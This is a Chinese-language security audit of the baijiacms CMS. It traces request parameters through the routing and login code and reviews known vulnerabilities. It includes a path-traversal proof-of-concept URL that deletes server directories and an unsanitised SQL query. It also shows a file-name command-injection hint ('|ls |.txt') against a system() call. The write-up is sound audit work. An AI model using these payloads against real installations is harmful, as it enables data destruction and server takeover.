baijiacms-master 审计实验
·
01动态数据流动
为什么默认这个,观察参数流动
搜索关键字
给两个文件都打上断点,看最终流向
最终流向这里
观察代码
跳转
<?php defined('IN_IA') or exit('Access Denied');?><?php defined('SYSTEM_IN') or exit('Access Denied');?>
<div class="weui-msg__icon-area"><i class="<?php if($label=='success') { ?>weui-icon-success<?php } else { ?>weui-icon-warn<?php } ?> weui-icon_msg"></i></div>
<div class="weui-msg__text-area">
<?php if(is_array($msg)) { ?>
<h4>MYSQL 错误:</h4>
<p><?php echo cutstr($msg['sql'], 300, 1);?></p>
<p><b><?php echo $msg['error']['0'];?> <?php echo $msg['error']['1'];?>:</b><?php echo $msg['error']['2'];?></p>
<?php }else{ ?>
<h2 class="weui-msg__title"><?php echo $msg;?></h2>
<?php } ?> </div>
<div class="weui-msg__opr-area">
<p class="weui-btn-area">
<?php if($redirect) { ?>
<a id="href" href="<?php echo $redirect;?>" class="weui-btn <?php if($label=='success') { ?>weui-btn_primary<?php } else { ?>weui-btn_warn<?php } ?>">页面自动跳转,等待时间: <b id="wait"><?php echo $sec<=0?2:$sec?></b></a>
<script type="text/javascript">
(function(){
var wait = document.getElementById('wait'),href = document.getElementById('href').href;
var interval = setInterval(function(){
var time = --wait.innerHTML;
if(time == 0) {
location.href = href;
clearInterval(interval);
};
}, 1000);
})();
</script>
<?php } else { ?>
<a href="javascript:history.go(-1);"class="weui-btn weui-btn_warn">点击这里返回上一页</a>
<?php }
?>
经过不停的断点,最终发现数据流向
E:\baijiacms-master\includes\baijiacms\runner.inc.php
$class->module = $modulename;
if (method_exists($class, $method)) {
exit($class->$method());
}else
{
exit($method." no this method");
}
}
}
}mobile.php
public function do_shopindex()
{
global $_GP;
$this->__mobile(__FUNCTION__);
}E:\baijiacms-master\system\common\mobile.php
public function __mobile($f_name){
global $_CMS,$_GP,$_W,$_GPC;
if(empty($_CMS['beid']))
{
message("未找到站点ID");
}
$filephp=$_CMS['module'].'/class/mobile/'.strtolower(substr($f_name,3)).'.php';
include_once SYSTEM_ROOT.$filephp;
}function message($msg, $redirect = '', $type = '',$successAutoNext=true,$sec=2) {
global $_CMS,$_GP;
$sec=intval($sec);
if($redirect == 'refresh') {
$redirect = refresh();
}
if($redirect == '') {
$type = in_array($type, array('success', 'error', 'info', 'warning', 'ajax', 'sql')) ? $type : 'info';
} else {
$type = in_array($type, array('success', 'error', 'info', 'warning', 'ajax', 'sql')) ? $type : 'success';
}
if ($_CMS['isajax'] || !empty($_GET['isajax']) || $type == 'ajax') {
if($type != 'ajax' && !empty($_GP['target'])) {
exit("
<script type=\"text/javascript\">
parent.require(['jquery', 'util'], function($, util){
var url = ".(!empty($redirect) ? 'parent.location.href' : "''").";
var modalobj = util.message('".$msg."', '', '".$type."');
if (url) {
modalobj.on('hide.bs.modal', function(){\$('.modal').each(function(){if(\$(this).attr('id') != 'modal-message') {\$(this).modal('hide');}});top.location.reload()});
}
});
</script>");
} else {
$vars = array();
$vars['message'] = $msg;
$vars['redirect'] = $redirect;
$vars['type'] = $type;
exit(json_encode($vars));
}
}
if (empty($msg) && !empty($redirect)) {
header('location: '.$redirect);
}
$label = $type;
if($type == 'error') {
$label = 'danger';
}
if($type == 'ajax' || $type == 'sql') {
$label = 'warning';
}
include page('message');
exit();
}
路径返回,看看可不可以控制
最后一步
有参数
跳转控制
$_GP = $_CMS = array();
$_GP = array_merge($_GET, $_POST, $_GP);
if(empty($_GP['m']))
{
$modulename = $_GP['act'];
}else
{
$modulename = $_GP['m'];
}
$_CMS['module']=$modulename;public function __mobile2($f_name){
global $_CMS,$_GP,$_W,$_GPC;
//$_GP['m']或$_GP['act']的值
//控制主文件夹
//截取前面的三个小写拼接
$filephp=$_CMS['module'].'/class/mobile/'.strtolower(substr($f_name,3)).'.php';
//进入文件
include_once SYSTEM_ROOT.$filephp;
}function page($filename, $type = false) {
global $_CMS,$_GP;
$do='';
if($type==true)
{
$do=$_GP['do']."/";
}
if(SYSTEM_ACT=='mobile') {
$source=SYSTEM_ROOT . $_CMS['module']."/template/mobile/".$do."{$filename}.php";
if (!is_file($source)) {
$source=SYSTEM_ROOT ."common/template/mobile/".$do."{$filename}.php";
}
}else
{
$source=SYSTEM_ROOT . $_CMS['module']."/template/web/".$do."{$filename}.php";
if (!is_file($source)) {
$source=SYSTEM_ROOT ."common/template/web/".$do."{$filename}.php";
}
}
return $source;
}message.php
<?php defined('IN_IA') or exit('Access Denied');?><?php defined('SYSTEM_IN') or exit('Access Denied');?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta content="telephone=no, address=no" name="format-detection">
<meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no" />
<meta name="apple-mobile-web-app-capable" content="yes" /> <!-- apple devices fullscreen -->
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
<title>跳转提示</title>
<link href="<?php echo RESOURCE_ROOT;?>public/weui.min.css" rel="stylesheet">
<link href="<?php echo RESOURCE_ROOT;?>public/weui.plus.css?v=2" rel="stylesheet">
</head>
<body>
<div class="page msg_success js_show" style="margin-top:50px">
<div class="weui-msg">
<div class="weui-msg__icon-area"><i class="<?php if($label=='success') { ?>weui-icon-success<?php } else { ?>weui-icon-warn<?php } ?> weui-icon_msg"></i></div>
<div class="weui-msg__text-area">
<?php if(is_array($msg)) { ?>
<h4>MYSQL 错误:</h4>
<p><?php echo cutstr($msg['sql'], 300, 1);?></p>
<p><b><?php echo $msg['error']['0'];?> <?php echo $msg['error']['1'];?>:</b><?php echo $msg['error']['2'];?></p>
<?php }else{ ?>
<h2 class="weui-msg__title"><?php echo $msg;?></h2>
<?php } ?> </div>
<div class="weui-msg__opr-area">
<p class="weui-btn-area">
<?php if($redirect) { ?>
<a id="href" href="<?php echo $redirect;?>" class="weui-btn <?php if($label=='success') { ?>weui-btn_primary<?php } else { ?>weui-btn_warn<?php } ?>">页面自动跳转,等待时间: <b id="wait"><?php echo $sec<=0?2:$sec?></b></a>
<script type="text/javascript">
(function(){
var wait = document.getElementById('wait'),href = document.getElementById('href').href;
var interval = setInterval(function(){
var time = --wait.innerHTML;
if(time == 0) {
location.href = href;
clearInterval(interval);
};
}, 1000);
})();
</script>
<?php } else { ?>
<a href="javascript:history.go(-1);"class="weui-btn weui-btn_warn">点击这里返回上一页</a>
<?php }
?>
</p>
</div>
<div class="weui-msg__extra-area">
<div class="weui-footer">
<p class="weui-footer__text">Copyright © 2016 baijiacms.com</p>
</div>
</div>
</div>
</div>
</body>
</html>
02 参数控制实验
$_GP = $_CMS = array();
$_GP = array_merge($_GET, $_POST, $_GP);
if(empty($_GP['m']))
{
$modulename = $_GP['act'];
}else
{
$modulename = $_GP['m'];
}
$_CMS['module']=$modulename;
if(!empty($_GP['isaddons']))
{
$_CMS['isaddons']=true;
}$t_set_shop=globalSetting('shop');//这里检查
//$_CMS['beid']=$_GP['beid'];
//参数控制get,检查beid是否不为空,寻找SYSTEM_ACT默认模式常量是否为mobile
//检查get act或m是不是等于shopwap或get isaddons是否不为空或m=eshop
if(!empty($_CMS['beid'])&&SYSTEM_ACT=='mobile'&&($modulename=="shopwap"||$_CMS['isaddons']==true||$_GP['m']=='eshop'))
{
//这里可能触发反序列化
//返回数据库
$t_set_shop=globalSetting('shop');
//如果$t_set_shop['close']有值并且$t_set_shop['closedetail']也有值
if(!empty($t_set_shop['close'])&&!empty($t_set_shop['closedetail']))
{
//没有值
if(!empty($t_set_shop['closeurl']))
{
//跳转页面
message($t_set_shop['closedetail'],$t_set_shop['closeurl'],'error');
}else
{//跳转页面
message($t_set_shop['closedetail']);
}
}
}//isaddons=1
if(!empty($_GP['isaddons']))
{
$_CMS['isaddons']=true;
}$classname = $modulename."Addons";
if($_CMS['isaddons']==true)
{
require(WEB_ROOT.'/system/common/addons.php');
if(SYSTEM_ACT=='mobile')
{
require(WEB_ROOT.'/system/common/mobile.php');
$file = ADDONS_ROOT . $modulename."/mobile.php";
}else
{
$file = ADDONS_ROOT . $modulename."/web.php";
}
}else
{//默认
if(SYSTEM_ACT=='mobile')
{
require(WEB_ROOT.'/system/common/mobile.php');
$file = SYSTEM_ROOT . $modulename."/mobile.php";
}else
{
require(WEB_ROOT.'/system/common/web.php');
$file = SYSTEM_ROOT . $modulename."/web.php";
}
}
if(is_login_account()&&!empty($_CMS['beid'])&&($_GP['m']=='eshop'||$_GP['act']=='shopwap'))
{
$tg_openid=get_sysopenid(false);
$tg_member = pdo_fetch('select openid,isagent,status,isblack from ' . tablename('eshop_member') . ' where openid=:openid and uniacid=:uniacid limit 1', array(
':uniacid' =>$_CMS['beid'],
':openid' => $tg_openid));
if(!empty($tg_member['isblack']))
{
message("该账户已被管理员加入黑名单禁止访问。");
}
if(empty($tg_member['isagent']))
{
}
if(!empty($tg_member['isagent'])&&!empty($tg_member['status']))
{
$_CMS['shopwap_member_isagent']=true;
if(empty($_GP['shareid']))
{
if(!empty($_SERVER['QUERY_STRING']))
{
$url = WEBSITE_ROOT . 'index.php?' . $_SERVER['QUERY_STRING'].'&shareid='.$tg_member['openid'] ;
}else
{
$url = WEBSITE_ROOT . 'index.php?shareid='.$tg_member['openid'] ;
}
header("Location:".$url);
exit;
}
}
}
if(is_login_account()==false){
if(empty($_SESSION[MOBILE_USER_SHAREID])&&!empty($_GP['shareid']))
{
$_SESSION[MOBILE_USER_SHAREID]=$_GP['shareid'];
}
function is_login_account()
{
if(!empty($_SESSION[MOBILE_SESSION_ID]))
{
return true;
}
return false;
}
//这东西登录时才会产生
//检查登录过没
function save_member_login($openid)
{
global $_CMS;
$member = mysqld_select("SELECT * FROM ".table('base_member')." where openid=:openid and beid=:beid limit 1", array(':openid' => $openid,':beid'=>$_CMS['beid']));
//$member['openid']不是空
if(!empty($member['openid']))
{
pdo_update('eshop_member_cart', array( 'openid'=>$member['openid']), array(
'openid'=>$_SESSION[MOBILE_TEMP_SESSION_ID],'uniacid' => $_CMS['beid']
));
//记录,
$_SESSION[MOBILE_SESSION_ID]=$member['openid'];
$_SESSION[MOBILE_TEMP_SESSION_ID]=$member['openid'];
//
checkAgent(0,$member['openid'],0,false);
//登录成功
return $member['openid'];
}
message("登录失败");
}//失败跳转
function get_sysopenid($mustlogin)
{
if(empty($_SESSION[MOBILE_SESSION_ID]))
{
if($mustlogin)
{
tosaveloginfrom();
header("location:".create_url('mobile',array('act' => 'shopwap','do' => 'login')));
exit;
}
}function globalSetting($groupkey)
{
global $_CMS;
return globalBeSetting($_CMS['beid'],$groupkey);
}function globalBeSetting($beid,$groupkey)
{
global $_CMS;
if(empty($beid))
{
message('未找到站点id');
}
if(empty($groupkey))
{
message("读取配置失败");
}
if(!empty($_CMS[$_CMS['beid'].'_'.$groupkey.'_setting']))
{
return $_CMS[$_CMS['beid'].'_'.$groupkey.'_setting'];
}
$config=array();
$system_config_cache = mysqld_select('SELECT * FROM '.table('config')." where `name`='system_config_cache' and `beid`=:beid and `group`=:group",array(":beid"=>$beid,':group'=>$groupkey));
if(empty($system_config_cache['value']))
{
$configdata = mysqld_selectall('SELECT * FROM '.table('config')." where `beid`=:beid and `group`=:group",array(":beid"=>$beid,':group'=>$groupkey));
foreach ($configdata as $item) {
$config[$item['name']]=$item['value'];
}
if(!empty($system_config_cache['name']))
{
mysqld_update('config', array('value'=>serialize($config)), array('name'=>'system_config_cache','beid'=>$beid,'group'=>$groupkey));
}else
{
mysqld_insert('config', array('name'=>'system_config_cache','value'=>serialize($config),'beid'=>$beid,'group'=>$groupkey));
}
$_CMS[$_CMS['beid'].'_'.$groupkey.'_setting']=$config;
return $config;
}else
{
$_CMS[$_CMS['beid'].'_'.$groupkey.'_setting']=unserialize($system_config_cache['value']);
//触发反序列化
return unserialize($system_config_cache['value']);
}
}
massage
//
function message($msg, $redirect = '', $type = '',$successAutoNext=true,$sec=2) {
global $_CMS,$_GP;
$sec=intval($sec);
if($redirect == 'refresh') {
$redirect = refresh();
}
if($redirect == '') {
//数组键值
$type = in_array($type, array('success', 'error', 'info', 'warning', 'ajax', 'sql')) ? $type : 'info';
} else {
//
$type = in_array($type, array('success', 'error', 'info', 'warning', 'ajax', 'sql')) ? $type : 'success';
}
if ($_CMS['isajax'] || !empty($_GET['isajax']) || $type == 'ajax') {
if($type != 'ajax' && !empty($_GP['target'])) {
exit("
<script type=\"text/javascript\">
parent.require(['jquery', 'util'], function($, util){
var url = ".(!empty($redirect) ? 'parent.location.href' : "''").";
var modalobj = util.message('".$msg."', '', '".$type."');
if (url) {
modalobj.on('hide.bs.modal', function(){\$('.modal').each(function(){if(\$(this).attr('id') != 'modal-message') {\$(this).modal('hide');}});top.location.reload()});
}
});
</script>");
} else {
$vars = array();
//路径
$vars['message'] = $msg;
$vars['redirect'] = $redirect;
$vars['type'] = $type;
//json
exit(json_encode($vars));
}
}
if (empty($msg) && !empty($redirect)) {
header('location: '.$redirect);
}
$label = $type;
if($type == 'error') {
$label = 'danger';
}
if($type == 'ajax' || $type == 'sql') {
$label = 'warning';
}
//有跳转message
include page('message');
exit();
}
//include page('message');
//默认$type = false
//默认message
function page($filename, $type = false) {
global $_CMS,$_GP;
$do='';
//
if($type==true)
{
$do=$_GP['do']."/";
}
//如果是默认
if(SYSTEM_ACT=='mobile') {
//默认进入message。php
$source=SYSTEM_ROOT . $_CMS['module']."/template/mobile/".$do."{$filename}.php";
if (!is_file($source)) {
$source=SYSTEM_ROOT ."common/template/mobile/".$do."{$filename}.php";
}
}else
{
$source=SYSTEM_ROOT . $_CMS['module']."/template/web/".$do."{$filename}.php";
if (!is_file($source)) {
$source=SYSTEM_ROOT ."common/template/web/".$do."{$filename}.php";
}
}
//
return $source;
}system/common/mobile.ph:17
if(is_login_account()&&!empty($_CMS['beid'])&&($_GP['m']=='eshop'||$_GP['act']=='shopwap'))
{
$tg_openid=get_sysopenid(false);
$tg_member = pdo_fetch('select openid,isagent,status,isblack from ' . tablename('eshop_member') . ' where openid=:openid and uniacid=:uniacid limit 1', array(
':uniacid' =>$_CMS['beid'],
':openid' => $tg_openid));
if(!empty($tg_member['isblack']))
{
message("该账户已被管理员加入黑名单禁止访问。");
}
if(empty($tg_member['isagent']))
{
}
if(!empty($tg_member['isagent'])&&!empty($tg_member['status']))
{
$_CMS['shopwap_member_isagent']=true;
if(empty($_GP['shareid']))
{
if(!empty($_SERVER['QUERY_STRING']))
{
$url = WEBSITE_ROOT . 'index.php?' . $_SERVER['QUERY_STRING'].'&shareid='.$tg_member['openid'] ;
}else
{
$url = WEBSITE_ROOT . 'index.php?shareid='.$tg_member['openid'] ;
}
header("Location:".$url);
exit;
}
}
}
if(is_login_account()==false){
if(empty($_SESSION[MOBILE_USER_SHAREID])&&!empty($_GP['shareid']))
{
$_SESSION[MOBILE_USER_SHAREID]=$_GP['shareid'];
}
}$classname = $modulename."Addons";
$_W['isfounder']=true;
2
if($_CMS['isaddons']==true)
{
require(WEB_ROOT.'/system/common/addons.php');
if(SYSTEM_ACT=='mobile')
{
require(WEB_ROOT.'/system/common/mobile.php');
$file = ADDONS_ROOT . $modulename."/mobile.php";
}else
{
$file = ADDONS_ROOT . $modulename."/web.php";
}
}else
{
if(SYSTEM_ACT=='mobile')
{
require(WEB_ROOT.'/system/common/mobile.php');
$file = SYSTEM_ROOT . $modulename."/mobile.php";
}else
{
require(WEB_ROOT.'/system/common/web.php');
$file = SYSTEM_ROOT . $modulename."/web.php";
}
}到mobile.php
function is_login_account()
{
if(!empty($_SESSION[MOBILE_SESSION_ID]))
{
return true;
}
return false;
}03 登录链
includes/baijiacms/runner.inc.php:75
$classname = $modulename."Addons";
if($_CMS['isaddons']==true)
{
require(WEB_ROOT.'/system/common/addons.php');
if(SYSTEM_ACT=='mobile')
{
require(WEB_ROOT.'/system/common/mobile.php');
$file = ADDONS_ROOT . $modulename."/mobile.php";
}else
{
$file = ADDONS_ROOT . $modulename."/web.php";
}
}else
{
if(SYSTEM_ACT=='mobile')
{//
require(WEB_ROOT.'/system/common/mobile.php');
$file = SYSTEM_ROOT . $modulename."/mobile.php";
}else
{
require(WEB_ROOT.'/system/common/web.php');
$file = SYSTEM_ROOT . $modulename."/web.php";
}
}
{
if(SYSTEM_ACT=='mobile')
{
require(WEB_ROOT.'/system/common/mobile.php');
$file = SYSTEM_ROOT . $modulename."/mobile.php";
}else
{
require(WEB_ROOT.'/system/common/web.php');
$file = SYSTEM_ROOT . $modulename."/web.php";
}
}
if(!is_file($file)) {
exit('ModuleSite Definition File Not Found '.$file);
}
if(!empty($_GP['m']))
{
require(WEB_ROOT.'/system/common/common.php');
}
require $file;
if(!class_exists($classname)) {
exit('ModuleSite Definition Class Not Found');
}
$class = new $classname();
$class->module = $modulename;
$class->inMobile = SYSTEM_ACT=='mobile';
//get['m']
if($_GP['m']!='eshop')
{
//默认true
if($_CMS['isaddons']==true)
{
//
if($class instanceof BjModule) {
if(!empty($class)) {
if(isset($_GP['do'])) {
if(SYSTEM_ACT=='mobile')
{
$class->inMobile = true;
}else
{
$_W['isfounder']=true;
if($modulename=='manager')
{
check_managerlogin();
}else
{
check_login();
}
$class->inMobile = false;
}
$method = 'do_'.$_GP['do'];
}
$class->module = $modulename;
if (method_exists($class, $method)) {
exit($class->$method());
}else
{
exit($method." no this method");
}
}
}
exit('BjSystemModule Class Definition Error');
}else
{
if($class instanceof BjSystemModule) {
if(!empty($class)) {
if(isset($_GP['do'])) {
if(SYSTEM_ACT=='mobile')
{
$class->inMobile = true;
}else
{
$_W['isfounder']=true;
if($modulename=='manager')
{
check_managerlogin();
}else
{
check_login();
}
$class->inMobile = false;
}
$method = 'do_'.$_GP['do'];
}
$class->module = $modulename;
if (method_exists($class, $method)) {
//进入
exit($class->$method());
}else
{
exit($method." no this method");
}
}
}
}
}else
{
if($class instanceof BJexModule) {
$class->uniacid = $class->weid = $_W['uniacid'];
$class->modulename = $_W['module'];
$class->__define = $file;
$class->inMobile = defined('IN_MOBILE');
if(SYSTEM_ACT=='mobile')
{
define('IN_MOBILE', true);
$method = 'doMobile' . ucfirst($_GPC['do']);
if (method_exists($class, $method)) {
exit($class->$method());
}
exit();
}else
{
define('IN_SYS', true);
define('IN_MODULE', $_W['module']);
define('IN_IA', true);
$_W['isfounder']=true;
$method = 'doWeb' . ucfirst($_GPC['do']);
if (method_exists($class, $method)) {
check_login();
exit($class->$method());
}
exit("访问的方法 {$method} 不存在.");
}
}
exit('BjSystemModule Class Definition Error');
}public function do_login()
{
$this->__mobile2(__FUNCTION__);
}
public function __mobile2($f_name){
global $_CMS,$_GP,$_W,$_GPC;
$filephp=$_CMS['module'].'/class/mobile/'.strtolower(substr($f_name,3)).'.php';
include_once SYSTEM_ROOT.$filephp;
}
if($_GP['op']!='loginkey'&&!$this->check_verify($_GP['verify']))
{
message('验证码输入错误!','refresh','error');
}
if(!empty($_GP['username'])&&!empty($_GP['password']))
{
$account = mysqld_select('SELECT * FROM '.table('user')." WHERE username = :username and password=:password" , array(':username' => $_GP['username'],':password'=> md5($_GP['password'])));
}
if(empty($account['id'])&&$_GP['op']=='loginkey'&&!empty($_GP['loginkey']))
{
$loginkey=$_GP['loginkey'];
$account = mysqld_select('SELECT * FROM '.table('user')." WHERE loginkey=:loginkey" , array(':loginkey' => $loginkey));
if(!empty($account['id']))
{
mysqld_update('user',array('loginkey'=>''),array('id'=>$account['id']));
}
}
if(!empty($account['id']))
{
unset($account['password']);
if(!empty($account['is_admin']))
{
$_SESSION[WEB_SESSION_ACCOUNT]=$account;
if($_GP['op']=='loginkey'&&!empty($_GP['loginkey']))
{
header("location:".create_url('site',array('act' => 'public','do' => 'shop_index','beid'=> $_CMS['beid']))) ;
exit;
}
header("location:".create_url('site', array('act' => 'manager','do' => 'main')));
exit;
}else
{
$store = getStoreBeid($account['beid']);
if(empty($store['id']))
{
message("没有找到相关店铺");
}
if($_CMS['beid']!=$store['id'])
{
$loginkey=date('YmdHis') . random(6, 1);
mysqld_update('user',array('loginkey'=>$loginkey),array('id'=>$account['id']));
header("location:".'http://'.$store['website'].'/'.create_url('mobile', array('beid'=>$store['id'],'act' => 'public','do' => 'login','op'=>'loginkey','loginkey'=>$loginkey)));
exit;
}
$_SESSION[WEB_SESSION_ACCOUNT]=$account;
if($_GP['op']=='loginkey'&&!empty($_GP['loginkey']))
{
header("location:".create_url('site',array('act' => 'public','do' => 'shop_index','beid'=> $_CMS['beid']))) ;
exit;
}
header("location:".create_url('site', array('act' => 'public','do' => 'shop_index')));
exit;
}
}else
{
message('用户名密码错误!','refresh','error');
}
system/public/mobile.php:27
//验证码
public function check_verify($verify)
{
$verify=strtolower($verify);
//对比是不是对的
if($_SESSION["VerifyCode"]==md5($verify))
{
unset($_SESSION["VerifyCode"]);
return true;
}
return false;
}
}
/system/common/mobile.php
includes/baijiacms/user.inc.php:33
1
2
function is_login_account()
{
if(!empty($_SESSION[MOBILE_SESSION_ID]))
{
return true;
}
return false;
}
04 1 day
baijiacms路径遍历漏洞
| CNVD-ID | CNVD-2021-88727 |
| 公开日期 | 2021-11-18 |
| 危害级别 | 中 (AV:N/AC:L/Au:S/C:N/I:P/A:N) |
| 影响产品 | baijiacms baijiacms 4 |
| CVE ID | CVE-2020-25873 |
| 漏洞描述 | baijiacms是一套用于电子商务的内容管理系统(CMS)。 baijiacms存在路径遍历漏洞,该漏洞源于 database.php 中发现了一个目录遍历漏洞,攻击者可以通过id参数删除任意服务器上的文件夹。 |
| 漏洞类型 | 通用型漏洞 |
| 参考链接 | https://nvd.nist.gov/vuln/detail/CVE-2020-25873 |
//id可控,解码
$r = base64_decode($_GP['id']);
//固定目录
$path = WEB_ROOT . '/config/data_backup/';
//拼接
if(is_dir($path . $r)) {
$row = $ds[$r];
for($i = 1; $i <= $row['volume']; $i++) {
$sql = file_get_contents($path . $row['bakdir'] . "/baijiacms-{$i}.sql");
if(!empty($sql))
{
mysqld_batch($sql);
}
}
message('还原成功!', create_url('site', array('act' => 'manager','do' => 'database','op'=>'restore','ischeck'=>true)),'success');
}
if($operation=='delete')
{
$d = base64_decode($_GP['id']);
//触发点
$path = WEB_ROOT . '/config/data_backup/';
//任意目录删除
if(is_dir($path . $d)) {
rmdirs($path . $d);
message('备份删除成功!', create_url('site', array('act' => 'manager','do' => 'database','op'=>'restore')),'success');
}
}../../111
http://127.0.0.1:8077/index.php?mod=site&act=manager&do=database&op=delete&id=Li4vLi4vMTEx
Li4vLi4vMTEx
复现
复现成功
仅限后台
sql注入
这也有漏洞
直接代入
$activityid = intval ( $_GPC ['activityid'] );
$operation = !empty($_GPC['op']) ? $_GPC['op'] : 'display';
$pagetitle = "活动报名入口";
//id可控
$activity = pdo_fetch ("SELECT * FROM " . table ('activity') . " WHERE uniacid = '{$_W['uniacid']}' and id = " . $activityid );
if (empty ( $activity ['id'] )) {
message ('活动未找到');
}
$pagetitle=$activity['title'];
$activity['atlas'] = unserialize($activity['atlas']);
$activity['prize'] = unserialize($activity['prize']);
$condition = " activityid = $activityid and status = 0";
$records = pdo_fetchall ("SELECT * FROM " . table ('activity_records') . " WHERE $condition and (pic!='') ORDER BY id DESC limit 16");
$total = pdo_fetchcolumn('SELECT COUNT(*) FROM ' . table('activity_records') . " WHERE $condition ");
$total= $total+intval($activity['virtualrec']);
$jion = pdo_fetch('SELECT id FROM ' . table('activity_records') . " WHERE activityid=:activityid and status=:status and openid=:openid ", array(':activityid' => $activityid, ':status' => 0,':openid' =>$base_member['openid']));
include addons_page ('index');研究
if($operation=='install')
{
if(!empty($_GP['module_name']))
{
define('LOCK_TO_ADDONS_INSTALL',true);
require ADDONS_ROOT.$_GP['module_name'].'/installsql.php';
}
message('安装成功!','refresh','success');
}
if($operation=='uninstall')
{//GP可控,可以删除baijiacms_modules表下的活动名
if(!empty($_GP['module_name']))
{
define('LOCK_TO_ADDONS_UNINSTALL',true);
require ADDONS_ROOT.$_GP['module_name'].'/uninstallsql.php';
$sql = "
delete from `baijiacms_modules` where `name`='".$_GP['module_name']."';
delete from `baijiacms_modules_menu` where `module`='".$_GP['module_name']."';
";
mysqld_batch($sql);
}
message('卸载成功!','refresh','success');
}
if($operation=='update')
{
if(!empty($_GP['module_name']))
{
define('LOCK_TO_ADDONS_UPDATE',true);
require ADDONS_ROOT.$_GP['module_name'].'/updatesql.php';
}
message('更新成功!','refresh','success');
}
include page('modules_list');命令执行
| CNVD-ID | CNVD-2020-58369 |
| 公开日期 | 2020-11-14 |
| 危害级别 | 高 (AV:N/AC:H/Au:S/C:C/I:C/A:C) |
| 影响产品 | baijiacms baijiacms v4.1.4 |
| 漏洞描述 | baijiacms是一套用于电子商务的内容管理系统(CMS)。 baijiacms v4.1.4版本中存在命令执行漏洞,攻击者可以执行任何命令,从而获取服务器权限。 |
| 漏洞类型 | 通用型漏洞 |
| 参考链接 |
system
关键函数
//可控
//system_globa_setting伪造
function globaSystemSetting()
{
global $_CMS;
return $_CMS['system_globa_setting'];
}
//临时路径(包含文件名),文件名,小写后缀,真实路径(包含文件名),真实路径(包含文件名),f
function file_save($file_tmp_name,$filename,$extention,$file_full_path,$file_relative_path,$allownet=true)
{
//$_CMS['system_globa_setting']
$settings=globaSystemSetting();
//检查文件夹是否存在,移动
if(!file_move($file_tmp_name, $file_full_path)) {
return error(-1, '保存上传文件失败');
}
//不为空
//才会创建$quality_command,执行system
if(!empty($settings['image_compress_openscale']))
{
$scal=$settings['image_compress_scale'];
$quality_command='';
if(intval($scal)>0)
{
$quality_command=' -quality '.intval($scal);
}
//这里,看谁调用file_save
// |ls |.txt
system('convert'.$quality_command.' '.$file_full_path.' '.$file_full_path);
}
//临时,真实
function file_move($filename, $dest) {
//dirname是PHP中用于返回路径目录部分的函数,支持PHP 4至PHP 8等多个版本。该函数在PHP 4.0.3版本修正为POSIX兼容,当路径中无斜线时返回当前目录,否则去除末尾文件名部分并返回剩余路径。
//去了文件
mkdirs(dirname($dest));
//
if(is_uploaded_file($filename)) {
move_uploaded_file($filename, $dest);
} else {
rename($filename, $dest);
}
//返回tf
return is_file($dest);
}function mkdirs($path) {
//检查是不是一个目录
if(!is_dir($path)) {
mkdirs(dirname($path));
if(!empty($path))
{
mkdir($path);
}
}
return is_dir($path);
}includes/baijiacms/common.inc.php:659
2
//intval是PHP编程语言的内置函数,用于将指定变量转换为整型数值。
$uniacid = intval($_W['uniacid']);
if ($do == 'fetch') {
//url可控
$url = trim($_GPC['url']);
$file=fetch_net_file_upload($url);
if (is_error($file)) {
$result['message'] = $file['message'];
die(json_encode($result));
}
}function file_upload_base64($post) {
$base64=base64_decode($post);
$extention = "jpg";
$path = '/attachment/';
$extpath="{$extention}/" . date('Y/m/');
mkdirs(WEB_ROOT . $path . $extpath);
do {
$filename = random(15) . ".{$extention}";
} while(is_file(SYSTEM_WEBROOT . $path . $extpath. $filename));
$file_tmp_name = SYSTEM_WEBROOT . $path . $extpath. $filename;
$file_relative_path = $extpath. $filename;
if (file_put_contents($file_tmp_name, $base64) == false) {
$result['message'] = '提取失败.';
return $result;
}
$file_full_path = WEB_ROOT .$path . $extpath. $filename;
return file_save($file_tmp_name,$filename,$extention,$file_full_path,$file_relative_path);
}
失败
1
这里
PHP 中的 pathinfo() 函数
这是最常用的含义。pathinfo() 是 PHP 内置函数,用于解析文件路径并返回其组成部分。
-
返回内容:
dirname:目录路径basename:完整文件名(含扩展名)extension:文件扩展名(不含点)filename:不带扩展名的文件名(PHP 5.2.0+ 支持)
//临时文件名不为空
//文件检查上传成功了没
if (!empty($_FILES['weixin_verify_file']['tmp_name'])) {
//存储所有信息
$file=$_FILES['weixin_verify_file'];}
//获取后缀
//$file['name']原始文件名,PATHINFO_EXTENSION返回拓展
$extention = pathinfo($file['name'], PATHINFO_EXTENSION);
//全部小写
$extention=strtolower($extention);
if($extention=='txt')
{
//截取$_SERVER['PHP_SELF']获取相对路径,返回/前面一共几个字符
//去掉文件名,留下路径
//防穿越
$substr=substr($_SERVER['PHP_SELF'], 0, strrpos($_SERVER['PHP_SELF'], '/'));
//查看是否为空,如果是空
if(empty( $substr))
{
$substr="/";
}
//strrpos(WEB_ROOT."/", $substr),查找 $substr第一次出现的位置
//正确根目录
$verify_root= substr(WEB_ROOT."/",0, strrpos(WEB_ROOT."/", $substr))."/";
//可控
//临时路径,文件名,小写后缀,真实路径,真实路径,f
//文件名无过滤,穿越
file_save($file['tmp_name'],$file['name'],$extention,WEB_ROOT."/".$file['name'],WEB_ROOT."/".$file['name'],false);
//错误
if($verify_root!=WEB_ROOT."/")
{
copy(WEB_ROOT."/".$file['name'],$verify_root."/".$file['name']);
}
mysql_escape_string 是 PHP 中用于字符串转义的函数
code不可控
$parse = create_function('$v', 'return \'"\'.mysql_escape_string($v).\'"\';');
include
不可控
流动
else
{
defined('SYSTEM_ACT') or define('SYSTEM_ACT', 'index');
}
if($mod=='mobile')
{
defined('SYSTEM_ACT') or define('SYSTEM_ACT', 'mobile');
}else
{
defined('SYSTEM_ACT') or define('SYSTEM_ACT', 'index');
}
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111
$class->module = $modulename;
//method_exists 是 PHP 编程语言的内置函数,用于检测指定类或对象中是否存在特定方法。
if (method_exists($class, $method)) {
exit($class->$method());
}else
{
exit($method." no this method");
}
public function do_store()
{
$this->__managerweb(__FUNCTION__);
}
public function __managerweb($f_name){
global $_CMS,$_GP,$_W,$_GPC;
//拼接路径
$filephp=$_CMS['module'].'/class/web/'.strtolower(substr($f_name,3)).'.php';
include_once SYSTEM_ROOT.$filephp;
